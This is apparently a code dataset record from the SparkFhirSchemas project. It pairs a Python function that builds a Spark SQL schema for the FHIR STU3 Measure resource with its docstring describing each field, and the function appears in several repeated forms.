used.\n\n topic: Descriptive topics related to the content of the measure. 
Topics provide a\n high-level categorization of the type of the measure that can be useful for\n filtering and searching.\n\n contributor: A contributor to the content of the measure, including authors, editors,\n reviewers, and endorsers.\n\n contact: Contact details to assist a user in finding and communicating with the\n publisher.\n\n copyright: A copyright statement relating to the measure and/or its contents. Copyright\n statements are generally legal restrictions on the use and publishing of the\n measure.\n\n relatedArtifact: Related artifacts such as additional documentation, justification, or\n bibliographic references.\n\n library: A reference to a Library resource containing the formal logic used by the\n measure.\n\n disclaimer: Notices and disclaimers regarding the use of the measure, or related to\n intellectual property (such as code systems) referenced by the measure.\n\n scoring: Indicates how the calculation is performed for the measure, including\n proportion, ratio, continuous variable, and cohort. The value set is\n extensible, allowing additional measure scoring types to be represented.\n\n compositeScoring: If this is a composite measure, the scoring method used to combine the\n component measures to determine the composite score.\n\n type: Indicates whether the measure is used to examine a process, an outcome over\n time, a patient-reported outcome, or a structure measure such as utilization.\n\n riskAdjustment: A description of the risk adjustment factors that may impact the resulting\n score for the measure and how they may be accounted for when computing and\n reporting measure results.\n\n rateAggregation: Describes how to combine the information calculated, based on logic in each of\n several populations, into one summarized result.\n\n rationale: Provides a succint statement of the need for the measure. 
Usually includes\n statements pertaining to importance criterion: impact, gap in care, and\n evidence.\n\n clinicalRecommendationStatement: Provides a summary of relevant clinical guidelines or other clinical\n recommendations supporting the measure.\n\n improvementNotation: Information on whether an increase or decrease in score is the preferred\n result (e.g., a higher score indicates better quality OR a lower score\n indicates better quality OR quality is whthin a range).\n\n definition: Provides a description of an individual term used within the measure.\n\n guidance: Additional guidance for the measure including how it can be used in a clinical\n context, and the intent of the measure.\n\n set: The measure set, e.g. Preventive Care and Screening.\n\n group: A group of population criteria for the measure.\n\n supplementalData: The supplemental data criteria for the measure report, specified as either the\n name of a valid CQL expression within a referenced library, or a valid FHIR\n Resource Path.\n\n ' from spark_fhir_schemas.stu3.complex_types.extension import ExtensionSchema from spark_fhir_schemas.stu3.complex_types.meta import MetaSchema from spark_fhir_schemas.stu3.complex_types.narrative import NarrativeSchema from spark_fhir_schemas.stu3.simple_types.resourcelist import ResourceListSchema from spark_fhir_schemas.stu3.complex_types.identifier import IdentifierSchema from spark_fhir_schemas.stu3.complex_types.period import PeriodSchema from spark_fhir_schemas.stu3.complex_types.usagecontext import UsageContextSchema from spark_fhir_schemas.stu3.complex_types.codeableconcept import CodeableConceptSchema from spark_fhir_schemas.stu3.complex_types.contributor import ContributorSchema from spark_fhir_schemas.stu3.complex_types.contactdetail import ContactDetailSchema from spark_fhir_schemas.stu3.complex_types.relatedartifact import RelatedArtifactSchema from spark_fhir_schemas.stu3.complex_types.reference import ReferenceSchema from 
spark_fhir_schemas.stu3.complex_types.measure_group import Measure_GroupSchema from spark_fhir_schemas.stu3.complex_types.measure_supplementaldata import Measure_SupplementalDataSchema if ((max_recursion_limit and (nesting_list.count('Measure') >= max_recursion_limit)) or (max_nesting_depth and (nesting_depth >= max_nesting_depth))): return StructType([StructField('id', StringType(), True)]) my_nesting_list: List[str] = (nesting_list + ['Measure']) schema = StructType([StructField('id', StringType(), True), StructField('extension', ArrayType(ExtensionSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=extension_depth, max_extension_depth=max_extension_depth)), True), StructField('meta', MetaSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=(extension_depth + 1), max_extension_depth=max_extension_depth), True), StructField('implicitRules', StringType(), True), StructField('language', StringType(), True), StructField('text', NarrativeSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=(extension_depth + 1), max_extension_depth=max_extension_depth), True), StructField('contained', ArrayType(ResourceListSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=extension_depth, 
max_extension_depth=max_extension_depth)), True), StructField('resourceType', StringType(), True), StructField('url', StringType(), True), StructField('identifier', ArrayType(IdentifierSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=extension_depth, max_extension_depth=max_extension_depth)), True), StructField('version', StringType(), True), StructField('name', StringType(), True), StructField('title', StringType(), True), StructField('status', StringType(), True), StructField('experimental', BooleanType(), True), StructField('date', StringType(), True), StructField('publisher', StringType(), True), StructField('description', StringType(), True), StructField('purpose', StringType(), True), StructField('usage', StringType(), True), StructField('approvalDate', DateType(), True), StructField('lastReviewDate', DateType(), True), StructField('effectivePeriod', PeriodSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=(extension_depth + 1), max_extension_depth=max_extension_depth), True), StructField('useContext', ArrayType(UsageContextSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=extension_depth, max_extension_depth=max_extension_depth)), True), StructField('jurisdiction', ArrayType(CodeableConceptSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, 
include_extension=include_extension, extension_fields=extension_fields, extension_depth=extension_depth, max_extension_depth=max_extension_depth)), True), StructField('topic', ArrayType(CodeableConceptSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=extension_depth, max_extension_depth=max_extension_depth)), True), StructField('contributor', ArrayType(ContributorSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=extension_depth, max_extension_depth=max_extension_depth)), True), StructField('contact', ArrayType(ContactDetailSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=extension_depth, max_extension_depth=max_extension_depth)), True), StructField('copyright', StringType(), True), StructField('relatedArtifact', ArrayType(RelatedArtifactSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=extension_depth, max_extension_depth=max_extension_depth)), True), StructField('library', ArrayType(ReferenceSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=extension_depth, 
max_extension_depth=max_extension_depth)), True), StructField('disclaimer', StringType(), True), StructField('scoring', CodeableConceptSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=(extension_depth + 1), max_extension_depth=max_extension_depth), True), StructField('compositeScoring', CodeableConceptSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=(extension_depth + 1), max_extension_depth=max_extension_depth), True), StructField('type', ArrayType(CodeableConceptSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=extension_depth, max_extension_depth=max_extension_depth)), True), StructField('riskAdjustment', StringType(), True), StructField('rateAggregation', StringType(), True), StructField('rationale', StringType(), True), StructField('clinicalRecommendationStatement', StringType(), True), StructField('improvementNotation', StringType(), True), StructField('definition', ArrayType(StringType()), True), StructField('guidance', StringType(), True), StructField('set', StringType(), True), StructField('group', ArrayType(Measure_GroupSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=extension_depth, max_extension_depth=max_extension_depth)), True), StructField('supplementalData', 
ArrayType(Measure_SupplementalDataSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=extension_depth, max_extension_depth=max_extension_depth)), True)]) if (not include_extension): schema.fields = [(c if (c.name != 'extension') else StructField('extension', StringType(), True)) for c in schema.fields] return schema
The Measure resource provides the definition of a quality measure. id: The logical id of the resource, as used in the URL for the resource. Once assigned, this value never changes. extension: May be used to represent additional information that is not part of the basic definition of the resource. In order to make the use of extensions safe and manageable, there is a strict set of governance applied to the definition and use of extensions. Though any implementer is allowed to define an extension, there is a set of requirements that SHALL be met as part of the definition of the extension. meta: The metadata about the resource. This is content that is maintained by the infrastructure. Changes to the content may not always be associated with version changes to the resource. implicitRules: A reference to a set of rules that were followed when the resource was constructed, and which must be understood when processing the content. language: The base language in which the resource is written. text: A human-readable narrative that contains a summary of the resource, and may be used to represent the content of the resource to a human. The narrative need not encode all the structured data, but is required to contain sufficient detail to make it "clinically safe" for a human to just read the narrative. Resource definitions may define what content should be represented in the narrative to ensure clinical safety. contained: These resources do not have an independent existence apart from the resource that contains them - they cannot be identified independently, and nor can they have their own independent transaction scope. resourceType: This is a Measure resource url: An absolute URI that is used to identify this measure when it is referenced in a specification, model, design or an instance. This SHALL be a URL, SHOULD be globally unique, and SHOULD be an address at which this measure is (or will be) published. The URL SHOULD include the major version of the measure. 
For more information see [Technical and Business Versions](resource.html#versions). identifier: A formal identifier that is used to identify this measure when it is represented in other formats, or referenced in a specification, model, design or an instance. version: The identifier that is used to identify this version of the measure when it is referenced in a specification, model, design or instance. This is an arbitrary value managed by the measure author and is not expected to be globally unique. For example, it might be a timestamp (e.g. yyyymmdd) if a managed version is not available. There is also no expectation that versions can be placed in a lexicographical sequence. To provide a version consistent with the Decision Support Service specification, use the format Major.Minor.Revision (e.g. 1.0.0). For more information on versioning knowledge assets, refer to the Decision Support Service specification. Note that a version is required for non-experimental active artifacts. name: A natural language name identifying the measure. This name should be usable as an identifier for the module by machine processing applications such as code generation. title: A short, descriptive, user-friendly title for the measure. status: The status of this measure. Enables tracking the life-cycle of the content. experimental: A boolean value to indicate that this measure is authored for testing purposes (or education/evaluation/marketing), and is not intended to be used for genuine usage. date: The date (and optionally time) when the measure was published. The date must change if and when the business version changes and it must change if the status code changes. In addition, it should change when the substantive content of the measure changes. publisher: The name of the individual or organization that published the measure. description: A free text natural language description of the measure from a consumer's perspective. 
purpose: Explaination of why this measure is needed and why it has been designed as it has. usage: A detailed description of how the measure is used from a clinical perspective. approvalDate: The date on which the resource content was approved by the publisher. Approval happens once when the content is officially approved for usage. lastReviewDate: The date on which the resource content was last reviewed. Review happens periodically after approval, but doesn't change the original approval date. effectivePeriod: The period during which the measure content was or is planned to be in active use. useContext: The content was developed with a focus and intent of supporting the contexts that are listed. These terms may be used to assist with indexing and searching for appropriate measure instances. jurisdiction: A legal or geographic region in which the measure is intended to be used. topic: Descriptive topics related to the content of the measure. Topics provide a high-level categorization of the type of the measure that can be useful for filtering and searching. contributor: A contributor to the content of the measure, including authors, editors, reviewers, and endorsers. contact: Contact details to assist a user in finding and communicating with the publisher. copyright: A copyright statement relating to the measure and/or its contents. Copyright statements are generally legal restrictions on the use and publishing of the measure. relatedArtifact: Related artifacts such as additional documentation, justification, or bibliographic references. library: A reference to a Library resource containing the formal logic used by the measure. disclaimer: Notices and disclaimers regarding the use of the measure, or related to intellectual property (such as code systems) referenced by the measure. scoring: Indicates how the calculation is performed for the measure, including proportion, ratio, continuous variable, and cohort. 
The value set is extensible, allowing additional measure scoring types to be represented. compositeScoring: If this is a composite measure, the scoring method used to combine the component measures to determine the composite score. type: Indicates whether the measure is used to examine a process, an outcome over time, a patient-reported outcome, or a structure measure such as utilization. riskAdjustment: A description of the risk adjustment factors that may impact the resulting score for the measure and how they may be accounted for when computing and reporting measure results. rateAggregation: Describes how to combine the information calculated, based on logic in each of several populations, into one summarized result. rationale: Provides a succint statement of the need for the measure. Usually includes statements pertaining to importance criterion: impact, gap in care, and evidence. clinicalRecommendationStatement: Provides a summary of relevant clinical guidelines or other clinical recommendations supporting the measure. improvementNotation: Information on whether an increase or decrease in score is the preferred result (e.g., a higher score indicates better quality OR a lower score indicates better quality OR quality is whthin a range). definition: Provides a description of an individual term used within the measure. guidance: Additional guidance for the measure including how it can be used in a clinical context, and the intent of the measure. set: The measure set, e.g. Preventive Care and Screening. group: A group of population criteria for the measure. supplementalData: The supplemental data criteria for the measure report, specified as either the name of a valid CQL expression within a referenced library, or a valid FHIR Resource Path.
spark_fhir_schemas/stu3/complex_types/measure.py
get_schema
icanbwell/SparkFhirSchemas
2
python
@staticmethod
def get_schema(
    max_nesting_depth: Optional[int] = 6,
    nesting_depth: int = 0,
    nesting_list: List[str] = [],
    max_recursion_limit: Optional[int] = 2,
    include_extension: Optional[bool] = False,
    extension_fields: Optional[List[str]] = [
        'valueBoolean',
        'valueCode',
        'valueDate',
        'valueDateTime',
        'valueDecimal',
        'valueId',
        'valueInteger',
        'valuePositiveInt',
        'valueString',
        'valueTime',
        'valueUnsignedInt',
        'valueUri',
        'valueQuantity',
    ],
    extension_depth: int = 0,
    max_extension_depth: Optional[int] = 2,
) -> Union[StructType, DataType]:
    """
    Build the Spark SQL schema for the FHIR STU3 ``Measure`` resource
    (the definition of a quality measure).

    The schema is produced recursively: every nested FHIR complex type is
    generated by calling ``get_schema`` on its own schema class with
    ``nesting_depth`` incremented and ``'Measure'`` appended to the
    recursion path, so that mutually referencing types terminate.

    :param max_nesting_depth: maximum depth of nested complex types; when
        ``nesting_depth`` reaches it, a truncated one-column (``id``) struct
        is returned instead of the full schema.
    :param nesting_depth: nesting depth of the current call.
    :param nesting_list: type names already on the current recursion path.
        NOTE(review): mutable default argument — harmless here because the
        list is only read (``count``) and concatenated, never mutated.
    :param max_recursion_limit: maximum number of times ``'Measure'`` may
        appear on the recursion path before the schema is truncated.
    :param include_extension: when False, every ``extension`` field of this
        struct is replaced with a plain string column.
    :param extension_fields: extension ``value[x]`` field names, passed
        through unchanged to nested schemas.
    :param extension_depth: current extension nesting depth; incremented
        only for single-valued (non-array) nested complex types below.
    :param max_extension_depth: maximum extension nesting depth.
    :return: a ``StructType`` for Measure, or the truncated one-column
        struct when a depth/recursion limit has been reached.
    """
    # Imports are function-local: the schema modules reference each other,
    # so importing at module level would create circular imports.
    from spark_fhir_schemas.stu3.complex_types.extension import ExtensionSchema
    from spark_fhir_schemas.stu3.complex_types.meta import MetaSchema
    from spark_fhir_schemas.stu3.complex_types.narrative import NarrativeSchema
    from spark_fhir_schemas.stu3.simple_types.resourcelist import ResourceListSchema
    from spark_fhir_schemas.stu3.complex_types.identifier import IdentifierSchema
    from spark_fhir_schemas.stu3.complex_types.period import PeriodSchema
    from spark_fhir_schemas.stu3.complex_types.usagecontext import UsageContextSchema
    from spark_fhir_schemas.stu3.complex_types.codeableconcept import CodeableConceptSchema
    from spark_fhir_schemas.stu3.complex_types.contributor import ContributorSchema
    from spark_fhir_schemas.stu3.complex_types.contactdetail import ContactDetailSchema
    from spark_fhir_schemas.stu3.complex_types.relatedartifact import RelatedArtifactSchema
    from spark_fhir_schemas.stu3.complex_types.reference import ReferenceSchema
    from spark_fhir_schemas.stu3.complex_types.measure_group import Measure_GroupSchema
    from spark_fhir_schemas.stu3.complex_types.measure_supplementaldata import Measure_SupplementalDataSchema

    # Recursion/depth guard: beyond the limits, collapse to an id-only struct.
    if ((max_recursion_limit and (nesting_list.count('Measure') >= max_recursion_limit)) or
            (max_nesting_depth and (nesting_depth >= max_nesting_depth))):
        return StructType([StructField('id', StringType(), True)])
    # Record this type on the recursion path for all nested get_schema calls.
    my_nesting_list: List[str] = (nesting_list + ['Measure'])
    schema = StructType([
        # Logical id of the resource.
        StructField('id', StringType(), True),
        # Additional content defined by implementations.
        StructField('extension', ArrayType(ExtensionSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=extension_depth, max_extension_depth=max_extension_depth)), True),
        # Metadata about the resource (version, last-updated, profiles, ...).
        StructField('meta', MetaSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=(extension_depth + 1), max_extension_depth=max_extension_depth), True),
        StructField('implicitRules', StringType(), True),
        StructField('language', StringType(), True),
        # Human-readable narrative summary of the resource.
        StructField('text', NarrativeSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=(extension_depth + 1), max_extension_depth=max_extension_depth), True),
        # Contained, inline resources with no independent existence.
        StructField('contained', ArrayType(ResourceListSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=extension_depth, max_extension_depth=max_extension_depth)), True),
        StructField('resourceType', StringType(), True),
        # Canonical identification and versioning of this measure.
        StructField('url', StringType(), True),
        StructField('identifier', ArrayType(IdentifierSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=extension_depth, max_extension_depth=max_extension_depth)), True),
        StructField('version', StringType(), True),
        StructField('name', StringType(), True),
        StructField('title', StringType(), True),
        StructField('status', StringType(), True),
        StructField('experimental', BooleanType(), True),
        # Publication and descriptive metadata.
        StructField('date', StringType(), True),
        StructField('publisher', StringType(), True),
        StructField('description', StringType(), True),
        StructField('purpose', StringType(), True),
        StructField('usage', StringType(), True),
        StructField('approvalDate', DateType(), True),
        StructField('lastReviewDate', DateType(), True),
        StructField('effectivePeriod', PeriodSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=(extension_depth + 1), max_extension_depth=max_extension_depth), True),
        # Contexts, jurisdictions and topics the measure applies to.
        StructField('useContext', ArrayType(UsageContextSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=extension_depth, max_extension_depth=max_extension_depth)), True),
        StructField('jurisdiction', ArrayType(CodeableConceptSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=extension_depth, max_extension_depth=max_extension_depth)), True),
        StructField('topic', ArrayType(CodeableConceptSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=extension_depth, max_extension_depth=max_extension_depth)), True),
        # People/organizations involved with the measure.
        StructField('contributor', ArrayType(ContributorSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=extension_depth, max_extension_depth=max_extension_depth)), True),
        StructField('contact', ArrayType(ContactDetailSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=extension_depth, max_extension_depth=max_extension_depth)), True),
        StructField('copyright', StringType(), True),
        # Supporting artifacts and the formal measure logic (CQL libraries).
        StructField('relatedArtifact', ArrayType(RelatedArtifactSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=extension_depth, max_extension_depth=max_extension_depth)), True),
        StructField('library', ArrayType(ReferenceSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=extension_depth, max_extension_depth=max_extension_depth)), True),
        StructField('disclaimer', StringType(), True),
        # How the measure is scored / evaluated.
        StructField('scoring', CodeableConceptSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=(extension_depth + 1), max_extension_depth=max_extension_depth), True),
        StructField('compositeScoring', CodeableConceptSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=(extension_depth + 1), max_extension_depth=max_extension_depth), True),
        StructField('type', ArrayType(CodeableConceptSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=extension_depth, max_extension_depth=max_extension_depth)), True),
        # Free-text clinical/statistical guidance fields.
        StructField('riskAdjustment', StringType(), True),
        StructField('rateAggregation', StringType(), True),
        StructField('rationale', StringType(), True),
        StructField('clinicalRecommendationStatement', StringType(), True),
        StructField('improvementNotation', StringType(), True),
        StructField('definition', ArrayType(StringType()), True),
        StructField('guidance', StringType(), True),
        StructField('set', StringType(), True),
        # Population criteria groups and supplemental data definitions.
        StructField('group', ArrayType(Measure_GroupSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=extension_depth, max_extension_depth=max_extension_depth)), True),
        StructField('supplementalData', ArrayType(Measure_SupplementalDataSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=extension_depth, max_extension_depth=max_extension_depth)), True),
    ])
    if (not include_extension):
        # Flatten the extension column to a plain string when extensions
        # are not requested, keeping the column itself so the shape is stable.
        schema.fields = [(c if (c.name != 'extension') else StructField('extension', StringType(), True)) for c in schema.fields]
    return schema
@staticmethod def get_schema(max_nesting_depth: Optional[int]=6, nesting_depth: int=0, nesting_list: List[str]=[], max_recursion_limit: Optional[int]=2, include_extension: Optional[bool]=False, extension_fields: Optional[List[str]]=['valueBoolean', 'valueCode', 'valueDate', 'valueDateTime', 'valueDecimal', 'valueId', 'valueInteger', 'valuePositiveInt', 'valueString', 'valueTime', 'valueUnsignedInt', 'valueUri', 'valueQuantity'], extension_depth: int=0, max_extension_depth: Optional[int]=2) -> Union[(StructType, DataType)]: '\n The Measure resource provides the definition of a quality measure.\n\n\n id: The logical id of the resource, as used in the URL for the resource. Once\n assigned, this value never changes.\n\n extension: May be used to represent additional information that is not part of the basic\n definition of the resource. In order to make the use of extensions safe and\n manageable, there is a strict set of governance applied to the definition and\n use of extensions. Though any implementer is allowed to define an extension,\n there is a set of requirements that SHALL be met as part of the definition of\n the extension.\n\n meta: The metadata about the resource. This is content that is maintained by the\n infrastructure. Changes to the content may not always be associated with\n version changes to the resource.\n\n implicitRules: A reference to a set of rules that were followed when the resource was\n constructed, and which must be understood when processing the content.\n\n language: The base language in which the resource is written.\n\n text: A human-readable narrative that contains a summary of the resource, and may be\n used to represent the content of the resource to a human. 
The narrative need\n not encode all the structured data, but is required to contain sufficient\n detail to make it "clinically safe" for a human to just read the narrative.\n Resource definitions may define what content should be represented in the\n narrative to ensure clinical safety.\n\n contained: These resources do not have an independent existence apart from the resource\n that contains them - they cannot be identified independently, and nor can they\n have their own independent transaction scope.\n\n resourceType: This is a Measure resource\n\n url: An absolute URI that is used to identify this measure when it is referenced in\n a specification, model, design or an instance. This SHALL be a URL, SHOULD be\n globally unique, and SHOULD be an address at which this measure is (or will\n be) published. The URL SHOULD include the major version of the measure. For\n more information see [Technical and Business\n Versions](resource.html#versions).\n\n identifier: A formal identifier that is used to identify this measure when it is\n represented in other formats, or referenced in a specification, model, design\n or an instance.\n\n version: The identifier that is used to identify this version of the measure when it is\n referenced in a specification, model, design or instance. This is an arbitrary\n value managed by the measure author and is not expected to be globally unique.\n For example, it might be a timestamp (e.g. yyyymmdd) if a managed version is\n not available. There is also no expectation that versions can be placed in a\n lexicographical sequence. To provide a version consistent with the Decision\n Support Service specification, use the format Major.Minor.Revision (e.g.\n 1.0.0). For more information on versioning knowledge assets, refer to the\n Decision Support Service specification. Note that a version is required for\n non-experimental active artifacts.\n\n name: A natural language name identifying the measure. 
This name should be usable as\n an identifier for the module by machine processing applications such as code\n generation.\n\n title: A short, descriptive, user-friendly title for the measure.\n\n status: The status of this measure. Enables tracking the life-cycle of the content.\n\n experimental: A boolean value to indicate that this measure is authored for testing purposes\n (or education/evaluation/marketing), and is not intended to be used for\n genuine usage.\n\n date: The date (and optionally time) when the measure was published. The date must\n change if and when the business version changes and it must change if the\n status code changes. In addition, it should change when the substantive\n content of the measure changes.\n\n publisher: The name of the individual or organization that published the measure.\n\n description: A free text natural language description of the measure from a consumer\'s\n perspective.\n\n purpose: Explaination of why this measure is needed and why it has been designed as it\n has.\n\n usage: A detailed description of how the measure is used from a clinical perspective.\n\n approvalDate: The date on which the resource content was approved by the publisher. Approval\n happens once when the content is officially approved for usage.\n\n lastReviewDate: The date on which the resource content was last reviewed. Review happens\n periodically after approval, but doesn\'t change the original approval date.\n\n effectivePeriod: The period during which the measure content was or is planned to be in active\n use.\n\n useContext: The content was developed with a focus and intent of supporting the contexts\n that are listed. These terms may be used to assist with indexing and searching\n for appropriate measure instances.\n\n jurisdiction: A legal or geographic region in which the measure is intended to be used.\n\n topic: Descriptive topics related to the content of the measure. 
Topics provide a\n high-level categorization of the type of the measure that can be useful for\n filtering and searching.\n\n contributor: A contributor to the content of the measure, including authors, editors,\n reviewers, and endorsers.\n\n contact: Contact details to assist a user in finding and communicating with the\n publisher.\n\n copyright: A copyright statement relating to the measure and/or its contents. Copyright\n statements are generally legal restrictions on the use and publishing of the\n measure.\n\n relatedArtifact: Related artifacts such as additional documentation, justification, or\n bibliographic references.\n\n library: A reference to a Library resource containing the formal logic used by the\n measure.\n\n disclaimer: Notices and disclaimers regarding the use of the measure, or related to\n intellectual property (such as code systems) referenced by the measure.\n\n scoring: Indicates how the calculation is performed for the measure, including\n proportion, ratio, continuous variable, and cohort. The value set is\n extensible, allowing additional measure scoring types to be represented.\n\n compositeScoring: If this is a composite measure, the scoring method used to combine the\n component measures to determine the composite score.\n\n type: Indicates whether the measure is used to examine a process, an outcome over\n time, a patient-reported outcome, or a structure measure such as utilization.\n\n riskAdjustment: A description of the risk adjustment factors that may impact the resulting\n score for the measure and how they may be accounted for when computing and\n reporting measure results.\n\n rateAggregation: Describes how to combine the information calculated, based on logic in each of\n several populations, into one summarized result.\n\n rationale: Provides a succint statement of the need for the measure. 
Usually includes\n statements pertaining to importance criterion: impact, gap in care, and\n evidence.\n\n clinicalRecommendationStatement: Provides a summary of relevant clinical guidelines or other clinical\n recommendations supporting the measure.\n\n improvementNotation: Information on whether an increase or decrease in score is the preferred\n result (e.g., a higher score indicates better quality OR a lower score\n indicates better quality OR quality is whthin a range).\n\n definition: Provides a description of an individual term used within the measure.\n\n guidance: Additional guidance for the measure including how it can be used in a clinical\n context, and the intent of the measure.\n\n set: The measure set, e.g. Preventive Care and Screening.\n\n group: A group of population criteria for the measure.\n\n supplementalData: The supplemental data criteria for the measure report, specified as either the\n name of a valid CQL expression within a referenced library, or a valid FHIR\n Resource Path.\n\n ' from spark_fhir_schemas.stu3.complex_types.extension import ExtensionSchema from spark_fhir_schemas.stu3.complex_types.meta import MetaSchema from spark_fhir_schemas.stu3.complex_types.narrative import NarrativeSchema from spark_fhir_schemas.stu3.simple_types.resourcelist import ResourceListSchema from spark_fhir_schemas.stu3.complex_types.identifier import IdentifierSchema from spark_fhir_schemas.stu3.complex_types.period import PeriodSchema from spark_fhir_schemas.stu3.complex_types.usagecontext import UsageContextSchema from 